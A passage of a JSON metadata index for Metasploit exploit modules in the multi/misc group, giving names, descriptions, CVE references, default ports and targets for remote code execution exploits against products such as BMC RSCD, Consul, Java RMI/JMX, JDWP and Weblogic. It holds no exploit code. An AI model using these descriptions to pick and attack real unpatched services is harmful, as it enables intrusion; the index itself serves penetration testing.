"name": "BMC Server Automation RSCD Agent NSH Remote Command Execution",
"full_name": "exploit/multi/misc/bmc_server_automation_rscd_nsh_rce",
"rank": 600,
"disclosure_date": "2016-03-16",
"type": "exploit",
"author": [
"Olga Yanushkevich, ERNW <@yaole0>",
"Nicky Bloor (@NickstaDB) <nick@nickbloor.co.uk>"
],
"description": "This module exploits a weak access control check in the BMC Server\n Automation RSCD agent that allows arbitrary operating system commands\n to be executed without authentication.\n Note: Under Windows, non-powershell commands may need to be prefixed\n with 'cmd /c'.",
"references": [
"URL-https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/",
"URL-https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/",
"URL-https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/",
"CVE-2016-1542",
"CVE-2016-1543"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 4750,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows/VBS Stager",
"Unix/Linux",
"Generic Command"
],
"mod_time": "2018-01-14 18:28:40 +0000",
"path": "/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/bmc_server_automation_rscd_nsh_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/claymore_dual_miner_remote_manager_rce": {
"name": "Nanopool Claymore Dual Miner APIs RCE",
"full_name": "exploit/multi/misc/claymore_dual_miner_remote_manager_rce",
"rank": 600,
"disclosure_date": "2018-02-09",
"type": "exploit",
"author": [
"reversebrain <reversebrain@snado>",
"phra <phra@snado>"
],
"description": "This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.",
"references": [
"EDB-44638",
"CVE-2018-1000049",
"URL-https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 3333,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target",
"Linux",
"Windows"
],
"mod_time": "2018-06-28 01:33:56 +0000",
"path": "/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/claymore_dual_miner_remote_manager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/consul_rexec_exec": {
"name": "Hashicorp Consul Remote Command Execution via Rexec",
"full_name": "exploit/multi/misc/consul_rexec_exec",
"rank": 600,
"disclosure_date": "2018-08-11",
"type": "exploit",
"author": [
"Bharadwaj Machiraju <bharadwaj.machiraju@gmail.com>",
"Francis Alexander <helofrancis@gmail.com>",
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits a feature of Hashicorp Consul named rexec.",
"references": [
"URL-https://www.consul.io/docs/agent/options.html#disable_remote_exec",
"URL-https://www.consul.io/docs/commands/exec.html",
"URL-https://github.com/torque59/Garfield"
],
"platform": "Linux",
"arch": "",
"rport": 8500,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2018-12-24 13:48:07 +0000",
"path": "/modules/exploits/multi/misc/consul_rexec_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/consul_rexec_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/consul_service_exec": {
"name": "Hashicorp Consul Remote Command Execution via Services API",
"full_name": "exploit/multi/misc/consul_service_exec",
"rank": 600,
"disclosure_date": "2018-08-11",
"type": "exploit",
"author": [
"Bharadwaj Machiraju <bharadwaj.machiraju@gmail.com>",
"Francis Alexander <helofrancis@gmail.com >",
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits Hashicorp Consul's services API to gain remote command\n execution on Consul nodes.",
"references": [
"URL-https://www.consul.io/api/agent/service.html",
"URL-https://github.com/torque59/Garfield"
],
"platform": "Linux",
"arch": "",
"rport": 8500,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2018-12-24 13:30:03 +0000",
"path": "/modules/exploits/multi/misc/consul_service_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/consul_service_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/erlang_cookie_rce": {
"name": "Erlang Port Mapper Daemon Cookie RCE",
"full_name": "exploit/multi/misc/erlang_cookie_rce",
"rank": 500,
"disclosure_date": "2009-11-20",
"type": "exploit",
"author": [
"Daniel Mende",
"Milton Valencia (wetw0rk)"
],
"description": "The erlang port mapper daemon is used to coordinate distributed erlang instances.\n Should an attacker get the authentication cookie RCE is trivial. Usually, this\n cookie is named \".erlang.cookie\" and varies on location.",
"references": [
"URL-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/"
],
"platform": "",
"arch": "",
"rport": 25672,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Linux (CmdStager)",
"Windows",
"Windows (CmdStager)"
],
"mod_time": "2018-12-21 07:33:37 +0000",
"path": "/modules/exploits/multi/misc/erlang_cookie_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/erlang_cookie_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/hp_data_protector_exec_integutil": {
"name": "HP Data Protector EXEC_INTEGUTIL Remote Code Execution",
"full_name": "exploit/multi/misc/hp_data_protector_exec_integutil",
"rank": 500,
"disclosure_date": "2014-10-02",
"type": "exploit",
"author": [
"Aniway.Anyway <Aniway.Anyway@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists\n in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL\n request allows to execute arbitrary commands from a restricted directory. Since it\n includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute\n arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but\n an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP\n Data Protector for linux. This module has been tested successfully on HP Data Protector\n 9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.",
"references": [
"ZDI-14-344"
],
"platform": "",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux 64 bits / HP Data Protector 9",
"Windows 64 bits / HP Data Protector 9"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb",
"is_install_path": true,
"ref_name": "multi/misc/hp_data_protector_exec_integutil",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/hp_vsa_exec": {
"name": "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
"full_name": "exploit/multi/misc/hp_vsa_exec",
"rank": 600,
"disclosure_date": "2011-11-11",
"type": "exploit",
"author": [
"Nicolas Gregoire",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on\n versions prior to 9.5. By using a default account credential, it is possible\n to inject arbitrary commands as part of a ping request via port 13838.",
"references": [
"CVE-2012-4361",
"OSVDB-82087",
"EDB-18893",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086",
"URL-http://www.agarri.fr/blog/archives/2012/02/index.html"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 13838,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"HP VSA up to 8.5",
"HP VSA 9"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/hp_vsa_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/hp_vsa_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/indesign_server_soap": {
"name": "Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",
"full_name": "exploit/multi/misc/indesign_server_soap",
"rank": 600,
"disclosure_date": "2012-11-11",
"type": "exploit",
"author": [
"h0ng10",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"RunScript\" procedure provided by the SOAP interface of\n Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).\n\n The exploit drops the payload on the server and must be removed manually.",
"references": [
"OSVDB-87548",
"URL-http://secunia.com/advisories/48572/"
],
"platform": "OSX,Windows",
"arch": "",
"rport": 12345,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Indesign CS6 Server / Windows (64 bits)",
"Indesign CS6 Server / Mac OS X Snow Leopard 64 bits"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/misc/indesign_server_soap.rb",
"is_install_path": true,
"ref_name": "multi/misc/indesign_server_soap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/java_jdwp_debugger": {
"name": "Java Debug Wire Protocol Remote Code Execution",
"full_name": "exploit/multi/misc/java_jdwp_debugger",
"rank": 400,
"disclosure_date": "2010-03-12",
"type": "exploit",
"author": [
"Michael Schierl",
"Christophe Alladoum",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module abuses exposed Java Debug Wire Protocol services in order\n to execute arbitrary Java code remotely. It just abuses the protocol\n features, since no authentication is required if the service is enabled.",
"references": [
"OSVDB-96066",
"EDB-27179",
"URL-http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html",
"URL-https://seclists.org/nmap-dev/2010/q1/867",
"URL-https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java",
"URL-https://svn.nmap.org/nmap/scripts/jdwp-exec.nse",
"URL-http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html"
],
"platform": "Linux,OSX,Windows",
"arch": "armle, aarch64, x86, x64",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux (Native Payload)",
"OSX (Native Payload)",
"Windows (Native Payload)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/misc/java_jdwp_debugger.rb",
"is_install_path": true,
"ref_name": "multi/misc/java_jdwp_debugger",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/java_jmx_server": {
"name": "Java JMX Server Insecure Configuration Java Code Execution",
"full_name": "exploit/multi/misc/java_jmx_server",
"rank": 600,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Braden Thomas",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module takes advantage a Java JMX interface insecure configuration, which would\n allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication\n disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while\n interfaces with authentication enabled will be vulnerable only if a weak configuration\n is deployed (allowing to use javax.management.loading.MLet, having a security manager\n allowing to load a ClassLoader MBean, etc.).",
"references": [
"URL-https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf",
"URL-https://www.optiv.com/blog/exploiting-jmx-rmi",
"CVE-2015-2342"
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": [
999,
1090,
1098,
1099,
1100,
1101,
1102,
1103,
1129,
1030,
1035,
1199,
1234,
1440,
3273,
3333,
3900,
2199,
2809,
5520,
5580,
5521,
5999,
6060,
6789,
6996,
7700,
7800,
7878,
7890,
7801,
8050,
8051,
8085,
8091,
8205,
8303,
8642,
8701,
8686,
8888,
8889,
8890,
8901,
8902,
8903,
8999,
9001,
9003,
9004,
9005,
9050,
9090,
9099,
9300,
9500,
9711,
9809,
9810,
9811,
9812,
9813,
9814,
9815,
9875,
9910,
9991,
9999,
10001,
10162,
10098,
10099,
11001,
11099,
11333,
12000,
13013,
14000,
15000,
15001,
15200,
16000,
17200,
18980,
20000,
23791,
26256,
31099,
33000,
32913,
37718,
45230,
47001,
47002,
50050,
50500,
50501,
50502,
50503,
50504
],
"autofilter_services": [
"rmi",
"rmid",
"java-rmi",
"rmiregistry"
],
"targets": [
"Generic (Java Payload)"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/java_jmx_server.rb",
"is_install_path": true,
"ref_name": "multi/misc/java_jmx_server",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/java_rmi_server": {
"name": "Java RMI Server Insecure Default Configuration Java Code Execution",
"full_name": "exploit/multi/misc/java_rmi_server",
"rank": 600,
"disclosure_date": "2011-10-15",
"type": "exploit",
"author": [
"mihi"
],
"description": "This module takes advantage of the default configuration of the RMI Registry and\n RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n invokes a method in the RMI Distributed Garbage Collector which is available via every\n RMI endpoint, it can be used against both rmiregistry and rmid, and against most other\n (custom) RMI endpoints as well.\n\n Note that it does not work against Java Management Extension (JMX) ports since those do\n not support remote class loading, unless another RMI endpoint is active in the same\n Java process.\n\n RMI method calls do not support or require any sort of authentication.",
"references": [
"URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html",
"URL-http://www.securitytracker.com/id?1026215",
"CVE-2011-3556"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": 1099,
"autofilter_ports": [
999,
1090,
1098,
1099,
1100,
1101,
1102,
1103,
1129,
1030,
1035,
1199,
1234,
1440,
3273,
3333,
3900,
2199,
2809,
5520,
5580,
5521,
5999,
6060,
6789,
6996,
7700,
7800,
7878,
7890,
7801,
8050,
8051,
8085,
8091,
8205,
8303,
8642,
8701,
8686,
8888,
8889,
8890,
8901,
8902,
8903,
8999,
9001,
9003,
9004,
9005,
9050,
9090,
9099,
9300,
9500,
9711,
9809,
9810,
9811,
9812,
9813,
9814,
9815,
9875,
9910,
9991,
9999,
10001,
10162,
10098,
10099,
11001,
11099,
11333,
12000,
13013,
14000,
15000,
15001,
15200,
16000,
17200,
18980,
20000,
23791,
26256,
31099,
33000,
32913,
37718,
45230,
47001,
47002,
50050,
50500,
50501,
50502,
50503,
50504
],
"autofilter_services": [
"rmi",
"rmid",
"java-rmi",
"rmiregistry"
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/java_rmi_server.rb",
"is_install_path": true,
"ref_name": "multi/misc/java_rmi_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/legend_bot_exec": {
"name": "Legend Perl IRC Bot Remote Code Execution",
"full_name": "exploit/multi/misc/legend_bot_exec",
"rank": 600,
"disclosure_date": "2015-04-27",
"type": "exploit",
"author": [
"Jay Turla"
],
"description": "This module exploits a remote command execution on the Legend Perl IRC Bot.\n This bot has been used as a payload in the Shellshock spam last October 2014.\n This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and\n UDP flooding, the ability to remove system logs, and ability to gain root, and\n VNC scanning.\n\n Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script\n to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.",
"references": [
"OSVDB-121681",
"EDB-36836",
"URL-https://www.damballa.com/perlbotnado/",
"URL-http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Legend IRC Bot"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/legend_bot_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/legend_bot_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/msf_rpc_console": {
"name": "Metasploit RPC Console Command Execution",
"full_name": "exploit/multi/misc/msf_rpc_console",
"rank": 600,
"disclosure_date": "2011-05-22",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module connects to a specified Metasploit RPC server and\n uses the 'console.write' procedure to execute operating\n system commands. Valid credentials are required to access the\n RPC interface.\n\n This module has been tested successfully on Metasploit 4.15\n on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit\n 4.14 on Windows 7 SP1.",
"references": [
"URL-https://help.rapid7.com/metasploit/Content/api/rpc/overview.html",
"URL-https://community.rapid7.com/docs/DOC-1516"
],
"platform": "Ruby,Unix,Windows",
"arch": "",
"rport": 55552,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ruby",
"Windows CMD",
"Unix CMD"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/misc/msf_rpc_console.rb",
"is_install_path": true,
"ref_name": "multi/misc/msf_rpc_console",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/misc/msfd_rce_remote": {
"name": "Metasploit msfd Remote Code Execution",
"full_name": "exploit/multi/misc/msfd_rce_remote",
"rank": 600,
"disclosure_date": "2018-04-11",
"type": "exploit",
"author": [
"Robin Stenvi <robin.stenvi@gmail.com>"
],
"description": "Metasploit's msfd-service makes it possible to get a msfconsole-like\n interface over a TCP socket. If this socket is accessible on a remote\n interface, an attacker can execute commands on the victim's machine.\n\n If msfd is running with higher privileges than the current local user,\n this module can also be used for privilege escalation. In that case,\n port forwarding on the compromised host can be used.\n\n Code execution is achieved with the msfconsole command: irb -e 'CODE'.",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": 55554,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-04-27 18:35:30 +0000",
"path": "/modules/exploits/multi/misc/msfd_rce_remote.rb",
"is_install_path": true,
"ref_name": "multi/misc/msfd_rce_remote",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/nodejs_v8_debugger": {
"name": "NodeJS Debugger Command Injection",
"full_name": "exploit/multi/misc/nodejs_v8_debugger",
"rank": 600,
"disclosure_date": "2016-08-15",
"type": "exploit",
"author": [
"Patrick Thomas <pst@coffeetocode.net>"
],
"description": "This module uses the \"evaluate\" request type of the NodeJS V8\n debugger protocol (version 1) to evaluate arbitrary JS and\n call out to other system commands. The port (default 5858) is\n not exposed non-locally in default configurations, but may be\n exposed either intentionally or via misconfiguration.",
"references": [
"URL-https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md",
"URL-https://github.com/nodejs/node/pull/8106"
],
"platform": "",
"arch": "",
"rport": 5858,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NodeJS"
],
"mod_time": "2017-09-10 11:23:52 +0000",
"path": "/modules/exploits/multi/misc/nodejs_v8_debugger.rb",
"is_install_path": true,
"ref_name": "multi/misc/nodejs_v8_debugger",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/openoffice_document_macro": {
"name": "Apache OpenOffice Text Document Malicious Macro Execution",
"full_name": "exploit/multi/misc/openoffice_document_macro",
"rank": 600,
"disclosure_date": "2017-02-08",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module generates an Apache OpenOffice Text Document with a malicious macro in it.\n To exploit successfully, the targeted user must adjust the security level in Macro\n Security to either Medium or Low. If set to Medium, a prompt is presented to the user\n to enable or disable the macro. If set to Low, the macro can automatically run without\n any warning.\n\n The module also works against LibreOffice.",
"references": [
"URL-https://en.wikipedia.org/wiki/Macro_virus"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apache OpenOffice on Windows (PSH)",
"Apache OpenOffice on Linux/OSX (Python)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/openoffice_document_macro.rb",
"is_install_path": true,
"ref_name": "multi/misc/openoffice_document_macro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/openview_omniback_exec": {
"name": "HP OpenView OmniBack II Command Execution",
"full_name": "exploit/multi/misc/openview_omniback_exec",
"rank": 600,
"disclosure_date": "2001-02-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module uses a vulnerability in the OpenView Omniback II\n service to execute arbitrary commands. This vulnerability was\n discovered by DiGiT and his code was used as the basis for this\n module.\n\n For Microsoft Windows targets, due to module limitations, use the\n \"unix/cmd/generic\" payload and set CMD to your command. You can only\n pass a small amount of characters (4) to the command line on Windows.",
"references": [
"CVE-2001-0311",
"OSVDB-6018",
"BID-11032",
"URL-http://www.securiteam.com/exploits/6M00O150KG.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/multi/misc/openview_omniback_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/openview_omniback_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/osgi_console_exec": {
"name": "Eclipse Equinoxe OSGi Console Command Execution",
"full_name": "exploit/multi/misc/osgi_console_exec",
"rank": 300,
"disclosure_date": "2018-02-13",
"type": "exploit",
"author": [
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console\n 'fork' command to execute arbitrary commands on the remote system..",
"references": [
"URL-https://www.eclipse.org/equinox/documents/quickstart-framework.php"
],
"platform": "Linux,Windows",
"arch": "armle, aarch64, x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux (Bash Payload)",
"Windows (Powershell Payload)"
],
"mod_time": "2018-02-17 20:11:05 +0000",
"path": "/modules/exploits/multi/misc/osgi_console_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/osgi_console_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/pbot_exec": {
"name": "PHP IRC Bot pbot eval() Remote Code Execution",
"full_name": "exploit/multi/misc/pbot_exec",
"rank": 600,
"disclosure_date": "2009-11-02",
"type": "exploit",
"author": [
"evilcry",
"Jay Turla",
"bwall",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module allows remote command execution on the PHP IRC bot pbot by abusing\n the usage of eval() in the implementation of the .php command. In order to work,\n the data to connect to the IRC server and channel where find pbot must be provided.\n The module has been successfully tested on the version of pbot analyzed by Jay\n Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP\n SP3.",
"references": [
"OSVDB-84913",
"EDB-20168",
"URL-http://resources.infosecinstitute.com/pbot-analysis/"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"pbot"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/pbot_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/pbot_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/persistent_hpca_radexec_exec": {
"name": "HP Client Automation Command Injection",
"full_name": "exploit/multi/misc/persistent_hpca_radexec_exec",
"rank": 500,
"disclosure_date": "2014-01-02",
"type": "exploit",
"author": [
"Ben Turner",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on HP Client Automation, distributed\n actually as Persistent Systems Client Automation. The vulnerability exists in the Notify\n Daemon (radexecd.exe), which doesn't authenticate execution requests by default.\n\n This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2\n and CentOS 5.",
"references": [
"CVE-2015-1497",
"ZDI-15-038",
"URL-https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 3465,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Client Automation 9.0.0 / Linux",
"HP Client Automation 9.0.0 / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/persistent_hpca_radexec_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/ra1nx_pubcall_exec": {
"name": "Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution",
"full_name": "exploit/multi/misc/ra1nx_pubcall_exec",
"rank": 500,
"disclosure_date": "2013-03-24",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module allows remote command execution on the PHP IRC bot Ra1NX by\n using the public call feature in private message to covertly bypass the\n authentication system.",
"references": [
"OSVDB-91663",
"URL-https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0",
"URL-http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ra1NX / Unix",
"Ra1NX / Windows"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/ra1nx_pubcall_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/teamcity_agent_xmlrpc_exec": {
"name": "TeamCity Agent XML-RPC Command Execution",
"full_name": "exploit/multi/misc/teamcity_agent_xmlrpc_exec",
"rank": 600,
"disclosure_date": "2015-04-14",
"type": "exploit",
"author": [
"Dylan Pindur <dylanpindur@gmail.com>"
],
"description": "This module allows remote code execution on TeamCity Agents configured\n to use bidirectional communication via xml-rpc. In bidirectional mode\n the TeamCity server pushes build commands to the Build Agents over port\n TCP/9090 without requiring authentication. Up until version 10 this was\n the default configuration. This module supports TeamCity agents from\n version 6.0 onwards.",
"references": [
"URL-https://www.tenable.com/plugins/nessus/94675"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-11-27 14:23:56 +0000",
"path": "/modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/teamcity_agent_xmlrpc_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/veritas_netbackup_cmdexec": {
"name": "VERITAS NetBackup Remote Command Execution",
"full_name": "exploit/multi/misc/veritas_netbackup_cmdexec",
"rank": 600,
"disclosure_date": "2004-10-21",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module allows arbitrary command execution on an\n ephemeral port opened by Veritas NetBackup, whilst an\n administrator is authenticated. The port is opened and\n allows direct console access as root or SYSTEM from\n any source address.",
"references": [
"CVE-2004-1389",
"OSVDB-11026",
"BID-11494"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb",
"is_install_path": true,
"ref_name": "multi/misc/veritas_netbackup_cmdexec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/w3tw0rk_exec": {
"name": "w3tw0rk / Pitbul IRC Bot Remote Code Execution",
"full_name": "exploit/multi/misc/w3tw0rk_exec",
"rank": 600,
"disclosure_date": "2015-06-04",
"type": "exploit",
"author": [
"Jay Turla"
],
"description": "This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.",
"references": [
"OSVDB-120384",
"EDB-36652"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"w3tw0rk"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/w3tw0rk_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/w3tw0rk_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize": {
"name": "Oracle Weblogic Server Deserialization RCE",
"full_name": "exploit/multi/misc/weblogic_deserialize",
"rank": 0,
"disclosure_date": "2018-04-17",
"type": "exploit",
"author": [
"brianwrf",
"Jacob Robles"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.",
"references": [
"CVE-2018-2628",
"EDB-44553"
],
"platform": "",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows"
],
"mod_time": "2018-08-29 14:56:31 +0000",
